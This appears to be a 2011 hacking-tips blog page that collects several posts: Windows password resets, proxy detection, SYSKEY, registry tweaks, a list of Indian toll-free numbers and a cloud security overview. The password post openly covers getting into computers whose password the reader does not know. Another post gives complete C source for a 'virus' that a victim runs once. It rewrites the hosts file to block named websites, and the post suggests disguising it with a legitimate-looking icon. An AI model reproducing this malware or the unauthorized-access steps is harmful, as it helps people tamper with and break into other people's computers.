Search This Blog

Monday, February 7, 2011

How to Hack Windows Administrator Password

This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.
Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called  Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.
  • You do not need to know the old password to set a new one
  • Will detect and offer to unlock locked or disabled out user accounts!
  • There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.
 

How it works?

 
Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off your computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.
The download link for both CD and floppy drives along with the complete instructions is given below
Offline NT Password & Reg Editor Download
It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.
 

Another simple way to reset non-administrator account passwords

 
Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.
1. Open the command prompt (Start->Run->type cmd->Enter)
2. Now type net user and hit Enter
3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows
4. Type net user John * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.

How to Detect Anonymous IP Addresses

As the fraudsters are now becoming more sophisticated in bypassing the Geo-location controls by using proxies (Anonymous IPs) to spoof their IP address, it has become very much necessary to come up with a means for detecting the proxies so that the authenticity of the users can be verified. Using a proxy (web proxy) is the simplest and easiest way to conceal the IP address of an Internet user and maintain the online privacy. However proxies are more widely used by online fraudsters to engage in cyber crimes since it is the easiest way to hide their actual Geo-location such as city/country through a spoofed IP address. Following are some of the examples where fraudsters use the proxies to hide their actual IP.
 
1. Credit Card Frauds
For example, say a Nigerian fraudster tries to purchase goods online with a stolen credit card for which the billing address is associated with New York. Most credit card merchants use Geo-location to block orders from countries like Nigeria and other high risk countries. So in order to bypass this restriction the credit card fraudster uses a proxy to spoof his IP address so that it appears to have come from New York. The IP address location appears to be legitimate since it is in the same city as the billing address. A proxy check would be needed to flag this order.
 
2. Bypass Website Country Restrictions
Some website services are restricted to users form only a selected list of countries. For example, a paid survey may be restricted only to countries like United States and Canada. So a user from say China may use a proxy so as to make his IP appear to have come from U.S. so that he can earn from participating in the paid survey.
 

Proxy Detection Services

 
So in order to stop such online frauds, Proxy Detection has become a critical component. Today most companies, credit card merchants and websites that deal with e-commerce transactions make use of Proxy Detection Services like MaxMind and FraudLabs to detect the usage of proxy or spoofed IP from users participating online.
Proxy Detection web services allow instant detection of anonymous IP addresses. Even though the use of proxy address by users is not a direct indication of fraudulent behaviour, it can often indicate the intention of the user to hide his or her real IP. In fact, some of the most used ISPs like AOL and MSN are forms of proxies and are used by both good and bad consumers.
 
How Proxy Detection Works?
Proxy detection services often rely on IP addresses to determine whether or not the IP is a proxy. Merchants can obtain the IP address of the users from the HTTP header on the order that comes into their website. This IP address is sent to the proxy detecting service in real time to confirm it’s authenticity.
The proxy detection services on the other hand compare this IP against a known list of flagged IPs that belong to proxy services. If the IP is not on the list then it is authenticated and the confirmation is sent back to the merchant. Otherwise it is reported to be a suspected proxy. These proxy detection services work continuously to grab a list or range of IPs that are commonly used for proxy services. With this it is possible to tell whether or not a given IP address is a proxy or spoofed IP.
 
How to Tell Whether a given IP is Real or a Proxy?
There are a few free sites that help you determine whether or not a given IP is a proxy. You can use free services like WhatisMyIPAddress to detect proxy IPs. Just enter the suspected IP in the field and click on “Lookup IP Address” button to check the IP address. If it is a suspected proxy then you will see the results something as follows.
Detect Anonymous Proxy
So for all those who think that they can escape by using a spoofed IP, this post is the answer. I hope this information helps.

XP SysKey Trick

If you have Windows XP then I really think you're going to like this week's security tip. Are you in a situation where you really don't want anybody accessing the family PC while you're not around? Maybe you don't want anybody to use your computer at all. Maybe you just want a little tighter control over when and by whom your PC gets used. If any of these situations sounds like yours then read on.
 
This week's security tip is on the syskey command. The syskey is a command line tool to help you enable your Startup Key. Without getting too techy on you, the Startup key is a complex algorithm that if configured can stop anyone from logging on to your system who doesn't poses the key. No startup screen or user accounts will be available until you present the key, you're basically looking at a black screen with one small lonely window asking for the Startup Key to gain access. The Startup Key, which is a floppy disk with the appropriate key code, simply needs to be inserted into the floppy drive, and activated. This will satisfy the security request and allow you to proceed to the login screen. If you don't have a floppy drive then I'm afraid you might as well stop reading now.
The Startup Key is created when you enable the Startup Key process as described later in this article. One thing you must keep in mind, and is of the utmost importance, you should make at least one copy of this floppy, test it to insure that it works, and put it in a safe place. If you lose this Key you will not be able to log into you Operating System. You may even want to make a third copy to keep off-site. If you do lose your Startup key then your only option is to use a Restore Disk (If you have one) to restore your registry to a state it was prior to the enabling of Startup Key.
OK, if this sounds like a security measure you would like to put into action then follow the directions below. Again, please make at least one copy of this disk so you don't lock yourself out of your system and send me a bunch of hate e-mail. Well, with that said twice I guess it's show time. The directions below will help you get things set up, and below that I have attached a link out to Microsoft's information on this so you can look it over.
CONFIGURING STARTUP KEY:
* Go to Start/Run and in the blank field type "syskey" press enter, or OK.
* You should see a small window titled "Securing the Windows XP Account Database". From this Window select the "Update" button to move to the next window.
* The "Startup Key" is the next window. You'll see a couple of options there, but the one we are looking for says "Startup Key on floppy disk", along with some warning about how your system is going to startup now.
* After selecting this click OK, and a pop-up will alert you that the key has been changed. Another message follows asking you to insert a disk in drive A: (Floppy drive).
* Insert the floppy, click OK, and one more window will come up telling you that the Key has been changed and you need to have this floppy disk in order to log into Windows. That's exactly what we want.
When you're all done go ahead and eject the floppy (you might want to slide the little lock up on the floppy to insure you don't format it on accident), and restart the PC. Windows will appear to come up normally, but after it loads the kernel the "Windows XP Startup Key Disk" window pops-up. Grab your Startup Key floppy put it in the floppy drive, and select OK. You'll see Windows load up and bring you to your user logon screen.
I told you this is a cool trick and really helps lock down you PC. I hope you get some use out of this, but please be careful.

A Virus Program to Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.
NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?
Here is the sourcecode of the virus.
#include<stdio.h>
#include<dos.h>
#include<dir.h> char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

How to Compile ?
For step-by-step compilation guide, refer my post How to compile C Programs.

Testing
1. To test, run the compiled module. It will block the sites that is listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
3. To remove the virus type the following the Run.
%windir%\system32\drivers\etc
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this
127.0.0.1                                google.com
5. Delete all such entries which contain the names of blocked sites.
 
NOTE: You can also change the ICON of the virus to make it look like a legitimate program.This method is described in the post: How to Change the ICON of an EXE file ?

Setting the Recycle Bin to Always Delete

The Recycle Bin is the special folders of windows on the hard disk to store deleted files and folders. These files or folders can be restored from the Recycle Bin to their original location if required for use. But you can set the Recycle Bin setting that the files and folders are deleted from hard disk are not placed in the Recycle Bin. So with the help of windows registry editor you can set the Recycle Bin to always delete items.

Follow the given steps to edit computer registry for Recycle Bin:
  • First click on Start button then type Regedit in Run option.
  • Here locate the location to:
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Explorer\BitBucket
  • Here in right side panel, double click on NukeOnDelete and set its value 1. Now close the registry editor and restart your computer after any changes to go into effect.

How to prevent users from writing to USB drives?

Today USB drive also known as keychain drive is becoming the most popular removable storage device to move data to different locations. USB drives are available in the market with different features, for example password protected, compatible with all windows versions and extra storage capacity (up to 65 GB). 
A common security issue at organizations is how to prevent their workers to write data onto USB drives using their PCs, because a user can easily move confidential data for other location.
If you have windows XP with SP2, then you can disable the writing option to USB drives.
Follow the given steps to disable the USB writing option: 
To edit the computer registry, first you should log onto your computer with administrative rights. 
First click on Start button and type "Regedit" in Run option.
Here locate the location to: 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
Here in right side panel, click right to create a key with the name "StorageDevicePolicies".
Now in left side panel, select "StorageDevicePolicies" key, again right click to create new DWORD value then label it "WriteProtect".
Set its value to "1". But again enable this option set its values "0".
Now close the registry editor and restart your computer after any changes to go into effect.

How to increase the processor power of your computer?

Today tip is very useful for those users who are still using computer with minimum processor speed. To increase the performance of slow computer, you can force your system to free up the idle tasks that are running in the background and sharing processor power. This end tasks method force the computer to devote its full processor resource to what you want it to do.
Follow the given steps to end the idle tasks:
  • To enable this feature, you will need to be logged into your computer with administrative rights.
  • Click Start button and click on Run option.
  • In the Run box, type the command Rundll32.exe advapi32.dll,ProcessIdleTasks  command and press Ok button.
  • Here system will take some time to end the background idle tasks.

Automatic Screen Refresh

When you are working on your local computer and want to refresh any changes in your system automatically. For example some times you are watching sports results, online Stock Exchange rates and any changes to your hard drive but these changes are not usually refreshed until you press the F5 key on your keyboard.
To refresh your screen automatically you should edit your system Registry. But the best technique to edit the windows registry keys, always export or backup the whole windows registry keys on backup drive before editing. Because any mistake in Registry can cause serious problem in your computer to run properly.
Follow the given steps to change the updates automatically.

  • First click on Start button then type Regedit in Run option.
  • In Registry Editor panel go to the path:
  • HKEY_LOCAL_MACHINE / System / CurrentControlSet /
        Control / UpdateMode
  • Here in right hand side panel edit the DWORD value to be between 1 and 5.
  • Now restart your computer after any changes to go into effect.

Toll Free Number in INDIA

Airways

Indian Airlines – 1800 180 1407
Jet Airways – 1800 22 5522
SpiceJet – 1800 180 3333

Automobiles

Mahindra Scorpio – 1800 22 6006
Maruti – 1800 111 515 Tata Motors – 1800 22 5552
Windshield Experts – 1800 11 3636


Banks

ABN AMRO – 1800 11 2224
Canara Bank – 1800 44 6000
Citibank – 1800 44 2265 Corporatin Bank – 1800 443 555
Development Credit Bank – 1800 22 5769
HDFC Bank – 1800 227 227
ICICI Bank – 1800 333 499
ICICI Bank NRI – 1800 22 4848
IDBI Bank – 1800 11 6999
Indian Bank – 1800 425 1400
ING Vysya – 1800 44 9900
Kotak Mahindra Bank – 1800 22 6022
Lord Krishna Bank – 1800 11 2300
Punjab National Bank – 1800 122 222
State Bank of India – 1800 44 1955
Syndicate Bank – 1800 44 6655


Cell Phones


BenQ – 1800 22 08 08
Bird CellPhones – 1800 11 7700
Motorola MotoAssist – 1800 11 1211
Nokia – 3030 3838
Sony Ericsson – 3901 1111


Computers/

IT Adrenalin – 1800 444 445 AMD – 1800 425 6664 Apple Computers – 1800 444 683
Canon – 1800 333 366 Cisco Systems – 1800 221 777
Compaq – HP – 1800 444 999
Data One Broadband – 1800 424 1800
Dell – 1800 444 026 Epson – 1800 44 0011 eSys – 3970 0011 Genesis Tally Academy – 1800 444 888
HCL – 1800 180 8080 IBM – 1800 443 333 Lexmark – 1800 22 4477 Marshal ’s Point – 1800 33 4488
Microsoft – 1800 111 100 Microsoft Virus Update – 1901 333 334 Seagate – 1800 180 1104 Symantec – 1800 44 5533 TVS Electronics – 1800 444 566
WeP Peripherals – 1800 44 6446
Wipro – 1800 333 312 xerox – 1800 180 1225 Zenith – 1800 222 004 Couriers/Packers &
Movers ABT Courier – 1800 44 8585
AFL Wizz – 1800 22 9696

Agarwal Packers & Movers
– 1800 11 4321 Associated Packers P Ltd – 1800 21 4560
DHL – 1800 111 345 FedEx – 1800 22 6161 Goel Packers & Movers – 1800 11 3456
UPS – 1800 22 7171


Education


Edu Plus – 1800 444 000 Hindustan College – 1800 33 4438
NCERT – 1800 11 1265 Vellore Institute of
Technology – 1800 441 555 Healthcare Best on Health – 1800 11 8899
Dr Batras – 1800 11 6767 GlaxoSmithKline – 1800 22 8797
Johnson & Johnson – 1800 22 8111
Kaya Skin Clinic – 1800 22 5292
LifeCell – 1800 44 5323 Manmar Technologies – 1800 33 4420
Pfizer – 1800 442 442 Roche Accu-Chek – 1800 11 45 46
Rudraksha – 1800 21 4708 Varilux Lenses – 1800 44 8383
VLCC – 1800 33 1262 Home Appliances Aiwa/Sony – 1800 11 1188
Anchor Switches – 1800 22 7979 Blue Star – 1800 22 2200 Bose Audio – 1800 11 2673
Bru Coffee Vending Machines – 1800 44 7171 Daikin Air Conditioners – 1800 444 222
DishTV – 1800 12 3474 Faber Chimneys – 1800 21 4595
Godrej – 1800 22 5511 Grundfos Pumps – 1800 33 4555
LG – 1901 180 9999 Philips – 1800 22 4422 Samsung – 1800 113 444 Sanyo – 1800 11 0101 Voltas – 1800 33 4546 WorldSpace Satellite Radio
– 1800 44 5432 Hotel Reservations GRT Grand – 1800 44 5500 InterContinental Hotels Group – 1800 111 000 Marriott – 1800 22 0044 Sarovar Park Plaza – 1800 111 222
Taj Holidays – 1800 111 825 Insurance AMP Sanmar – 1800 44 2200
Aviva – 1800 33 2244 Bajaj Allianz – 1800 22 5858
Chola MS General Insurance
– 1800 44 5544 HDFC Standard Life – 1800 227 227
LIC – 1800 33 4433 Max New York Life – 1800 33 5577
Royal Sundaram – 1800 33 8899
SBI Life Insurance – 1800 22 9090 Mattresses Kurl-on – 1800 44 0404 Sleepwell – 1800 11 2266 Investments/Finance CAMS – 1800 44 2267 Chola Mutual Fund – 1800 22 2300

Easy IPO ’s – 3030 5757

Fidelity Investments –

1800 180 8000 Franklin Templeton Fund – 1800 425 4255
J M Morgan Stanley – 1800 22 0004
Kotak Mutual Fund – 1800 222 626
LIC Housing Finance – 1800 44 0005
SBI Mutual Fund – 1800 22 3040
Sharekhan – 1800 22 7500 Tata Mutual Fund – 1800 22 0101 Paints Asian Paints Home
Solutions – 1800 22 5678 Berger Paints Home Decor – 1800 33 8800 Teleshopping Asian Sky Shop – 1800 22 1800
Jaipan Teleshoppe – 1800 11 5225
Tele Brands – 1800 11 8000
VMI Teleshopping – 1800 447 777
WWS Teleshopping – 1800 220 777 Travel Club Mahindra Holidays – 1800 33 4539
Cox & Kings – 1800 22 1235
God TV Tours – 1800 442 777
Kerala Tourism – 1800 444 747
Kumarakom Lake Resort – 1800 44 5030
Raj Travels & Tours – 1800 22 9900
Sita Tours – 1800 111 911 SOTC Tours – 1800 22 3344 UPS APC – 1800 44 4272 Numeric – 1800 44 3266


Others Consumer


Helpline – 1800 11 4000
L’Or?al, GARNIeR – 1800 223 000
KONE Elevator – 1800 444 666
Indane – 1800 44 51 15 Aavin – 1800 44 3300 Pedigree – 1800 11 2121 Kodak India – 1800 22 8877
Domino’s Pizza – 1800 111 123
World Vision India – 1800 444 550
Telecom Monitoring Cell – 1800 110 420

Create your own search engine in three

1. open website http://www.funnylogo.info/create.asp 
2. enter your search engine name 
3. select style as per u like 
4. click on create my search engine p 
5. finally u gets ur search engine 
 
note: actuall mechanism is there that u have only replace google name with ur own rest of remains same. * this page u can put on ur personal website or bl...
You might also like:

Make Your PC Talk

Open a text file in notepad and write: Dim msg, sapimsg=InputBox("Enter your text","Talk it from hackerz7.tk")Set sapi=CreateObject("sapi.spvoice") sapi.Speak msg Save the file with a (*.vbs) extension, it will create a VBScript File. It will prompt you for a text when u open the file, input the text and press ok. u will hear what u typed this works in xp,may be in vista also.

Cloud Security

Before we talk about cloud security, its important to define the different cloud offerings enterprises hope to protect. Cloud models are:
  • Infrastructure as a Service (IaaS) – IaaS providers offer state-of-the-art flexible and secure cloud data centers. By pooling together large number of tenants, and leveraging virtualization and large scale management capabilities, IaaS providers deliver a sophisticated and elastic data center platform. Different IaaS providers offer Web attack protection and regulatory compliance readiness to their customers and generate incremental business.
  • Platform as a Service (PaaS) - PaaS providers offer application development and delivery platforms that accelerate time-to-market of new application and services. PaaS providers should provide their customers with Web attack protection as part of the underlying application architecture.
  • Software as a Service (SaaS) - SaaS providers deliver cloud-based business  applications for sales, financial, HR and other functional areas. These applications host large amounts of sensitive data across many organizations. As organizations adopt cloud applications to streamline their IT operations, SaaS providers are expected to ensure data security and address regulatory compliance – as would be the case for on-premise data.
Security Concerns With Cloud Computing
Migration to the cloud is on every organization’s objectives list. Yet, a Forrester 2009 Q4 survey encompassing 165 companies over 39 countries has shown otherwise. When asked “what are your top SaaS adoption inhibitors”, the most frequent cited concern was security, 48 percent.  This should surprise anyone since, after all, cloud services have fallen victim to security vulnerabilities. Just looking at the “big” players we can quickly count some of the mishaps: Gmail email and contact lists, as well as Yahoo mail, were prone to XSS and Javascript hijacking. Amazon EC2 was vulnerable to an Amazon Web Services signature vulnerability. Twitter has fallen prey to an attack when a hacker obtained and distributed more than 300 confidential documents pertaining to Twitter’s business affairs that were stored on Google Apps.
Threat in the Cloud
We outlined, in detail, concerns with cloud computing in previous blog post.  Many of the security threats that affect non cloud deployments are the same.  Hackers and insiders want data and we live in a data driven world.  But there are differences:
  • Maintaining bulletproof partitions between datasets of different customers.
  • Providing different levels of data security to applications sharing the same logical or physical platforms.
  • Protecting customer data from the prying eyes of cloud administrators.
  • Providing solutions that operate over a specialized infrastructure (VM, Amazon AMI).
  • Managing application and data security for a large number of applications inside the cloud.